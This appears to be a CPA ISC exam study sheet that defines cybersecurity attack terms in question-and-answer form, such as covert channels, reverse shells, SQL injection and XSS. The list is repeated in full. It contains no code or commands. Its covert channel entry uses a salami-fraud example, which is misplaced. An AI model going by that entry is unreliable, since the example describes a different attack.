CPA ISC S3 EXAM QUESTIONS WITH
COMPLETE ANSWERS
Insiders - ANSWER-employees that either organically developed into a person with
malicious intentions or intentionally infiltrated an organization to achieve nefarious
objectives
External Threats - ANSWER-Threats that originate outside an organization
Network Based Attack - ANSWER-attack targets the infrastructure of a network
including switches, routers, servers, and cabling, with the intent to gain unauthorized
access or disrupt operations for users
Backdoors/Trapdoors - ANSWER-methods to bypass security access procedures by
creating an entry and exit point to a network that is undocumented
Covert Channel - ANSWER-mechanisms used to transmit data using methods not
originally intended for data transmission by the system designers. Violate the entity
security policy but do not exceed entity access authorization, so they can
communicate data in small parts. (example of person stealing .005 off of 100 million
business each transaction by re-routing into personal bank account)
Storage Channel - ANSWER-data is transmitted by modifying a storage location,
allowing another party with lower security permission to access the data
Timing Channel - ANSWER-the delay or gap in transmitting data packets is used to
hide a transmission
Buffer Overflows - ANSWER-Insertion of malicious code into memory by overrunning
buffers outside of their assigned memory space.
Denial of Service (DoS) - ANSWER-One or more attackers attempt to flood a server
with so many incoming messages that the server is unable to handle legitimate
business
Distributed Denial of Service (DDoS) - ANSWER-Multiple machines simultaneously
launch attacks on the server to force it offline (multiple attackers)
Man-in-the-middle (MITM) attack - ANSWER-attacker acts as an intermediary
between two parties intercepting communications, acting as a legitimate entity within
a typical secure session
, Port-Scanning Attack - ANSWER-scanning networks for open ports is done by
attackers to find vulnerabilities that can be exploited so they can gain unauthorized
access to a company's network
Ransomware Attack - ANSWER-these are attackers that come in the form of
malware that locks a user or a company's operating systems, applications, and the
ability to access data unless a ransom is paid
Reverse Shell Attacks - ANSWER-a victim initiates communication with an attacker
from behind company firewall so the attacker can bypass the firewall and other
safeguards and remotely control the victims machine
Replay Attacks - ANSWER-cybercriminal eavesdrops on a secure network
communication, intercepts it, and then replays the message at a later time to the
intended target to gain access to the network and the data behind the firewall
Return Oriented Attacks - ANSWER-use a sophisticated technique that utilizes
pieces of legitimate original system code in a sequence to perform operations useful
to attacker (taking pieces from a shredder and putting it back together)
Spoofing - ANSWER-The act of impersonating someone or something to obtain
unauthorized system access by using falsified credentials or initiating a legitimate
person/entity by using fake IP address, domains, email address
Domain Name System (DNS) Spoofing - ANSWER-person modifies the domain
name to IP address mapping known as the domain name system
Hyperlink Spoofing - ANSWER-alternation of hyperlink URLs that redirect the victim
away from their intended destination
Address Resolution Spoofing (ARS) - ANSWER-involves a fraudulent act of falsifying
the mapping of media access control (MAC) addresses on a network to IP addresses
Application Based Attacks - ANSWER-target specific software or applications such
as databases or websites to gain unauthorized access or disrupt functionality
Structured Query Language (SQL) Injection - ANSWER-A type of attack in which the
hacker adds SQL code to a Web or application input to gain access to or alter data in
the database ; the target in this attack is the database
Cross Site Scripting (XSS) - ANSWER-inject code to a company's website that
attacks users visiting the company's website ; the target in this attack is the company
website to compromise the company's website user's data
Race Condition - ANSWER-attacker exploits system or application that relies on a
specific sequence of operations (forcing application to perform two ore more
operations out of order
COMPLETE ANSWERS
Insiders - ANSWER-employees that either organically developed into a person with
malicious intentions or intentionally infiltrated an organization to achieve nefarious
objectives
External Threats - ANSWER-Threats that originate outside an organization
Network Based Attack - ANSWER-attack targets the infrastructure of a network
including switches, routers, servers, and cabling, with the intent to gain unauthorized
access or disrupt operations for users
Backdoors/Trapdoors - ANSWER-methods to bypass security access procedures by
creating an entry and exit point to a network that is undocumented
Covert Channel - ANSWER-mechanisms used to transmit data using methods not
originally intended for data transmission by the system designers. Violate the entity
security policy but do not exceed entity access authorization, so they can
communicate data in small parts. (example of person stealing .005 off of 100 million
business each transaction by re-routing into personal bank account)
Storage Channel - ANSWER-data is transmitted by modifying a storage location,
allowing another party with lower security permission to access the data
Timing Channel - ANSWER-the delay or gap in transmitting data packets is used to
hide a transmission
Buffer Overflows - ANSWER-Insertion of malicious code into memory by overrunning
buffers outside of their assigned memory space.
Denial of Service (DoS) - ANSWER-One or more attackers attempt to flood a server
with so many incoming messages that the server is unable to handle legitimate
business
Distributed Denial of Service (DDoS) - ANSWER-Multiple machines simultaneously
launch attacks on the server to force it offline (multiple attackers)
Man-in-the-middle (MITM) attack - ANSWER-attacker acts as an intermediary
between two parties intercepting communications, acting as a legitimate entity within
a typical secure session
, Port-Scanning Attack - ANSWER-scanning networks for open ports is done by
attackers to find vulnerabilities that can be exploited so they can gain unauthorized
access to a company's network
Ransomware Attack - ANSWER-these are attackers that come in the form of
malware that locks a user or a company's operating systems, applications, and the
ability to access data unless a ransom is paid
Reverse Shell Attacks - ANSWER-a victim initiates communication with an attacker
from behind company firewall so the attacker can bypass the firewall and other
safeguards and remotely control the victims machine
Replay Attacks - ANSWER-cybercriminal eavesdrops on a secure network
communication, intercepts it, and then replays the message at a later time to the
intended target to gain access to the network and the data behind the firewall
Return Oriented Attacks - ANSWER-use a sophisticated technique that utilizes
pieces of legitimate original system code in a sequence to perform operations useful
to attacker (taking pieces from a shredder and putting it back together)
Spoofing - ANSWER-The act of impersonating someone or something to obtain
unauthorized system access by using falsified credentials or initiating a legitimate
person/entity by using fake IP address, domains, email address
Domain Name System (DNS) Spoofing - ANSWER-person modifies the domain
name to IP address mapping known as the domain name system
Hyperlink Spoofing - ANSWER-alternation of hyperlink URLs that redirect the victim
away from their intended destination
Address Resolution Spoofing (ARS) - ANSWER-involves a fraudulent act of falsifying
the mapping of media access control (MAC) addresses on a network to IP addresses
Application Based Attacks - ANSWER-target specific software or applications such
as databases or websites to gain unauthorized access or disrupt functionality
Structured Query Language (SQL) Injection - ANSWER-A type of attack in which the
hacker adds SQL code to a Web or application input to gain access to or alter data in
the database ; the target in this attack is the database
Cross Site Scripting (XSS) - ANSWER-inject code to a company's website that
attacks users visiting the company's website ; the target in this attack is the company
website to compromise the company's website user's data
Race Condition - ANSWER-attacker exploits system or application that relies on a
specific sequence of operations (forcing application to perform two ore more
operations out of order